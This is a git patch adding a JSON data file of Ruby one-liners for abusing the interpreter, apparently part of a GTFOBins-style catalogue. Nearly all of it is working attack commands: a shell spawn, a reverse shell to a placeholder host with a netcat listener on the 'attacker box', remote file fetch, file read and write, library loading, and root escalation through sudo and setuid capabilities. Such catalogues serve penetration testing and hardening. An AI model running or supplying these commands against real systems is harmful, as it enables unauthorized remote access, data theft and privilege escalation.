From 7cfbb1fc3c60bd6c6325a80aae64bc324d94df3b Mon Sep 17 00:00:00 2001
From: t0thkr1s <t0thkr1s@icloud.com>
Date: Fri, 10 Jan 2020 13:00:28 +0100
Subject: [PATCH] add data for ruby

---
 data/ruby.json | 52 ++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 52 insertions(+)
 create mode 100644 data/ruby.json

diff --git a/data/ruby.json b/data/ruby.json
new file mode 100644
index 0000000..b721c38
--- /dev/null
+++ b/data/ruby.json
@@ -0,0 +1,52 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "ruby -e 'exec \"/bin/sh\"'"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"[host]\",\"[port]\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.",
+        "code": "ruby -run -e httpd . -p [port]\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "ruby -e 'require \"open-uri\"; IO.copy_stream(open(\"[url]\"), \"[file]\")'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "ruby -e 'File.open(\"[file]\", \"w+\") { |f| f.write(\"DATA\") }'"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "ruby -e 'puts File.read(\"[file]\")'"
+      }
+    ],
+    "library-load": [
+      {
+        "code": "ruby -e 'require \"fiddle\"; Fiddle.dlopen(\"lib.so\")'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ruby -e 'exec \"/bin/sh\"'"
+      }
+    ],
+    "capabilities": [
+      {
+        "code": "./ruby -e 'Process::Sys.setuid(0); exec \"/bin/sh\"'"
+      }
+    ]
+  }
+}
\ No newline at end of file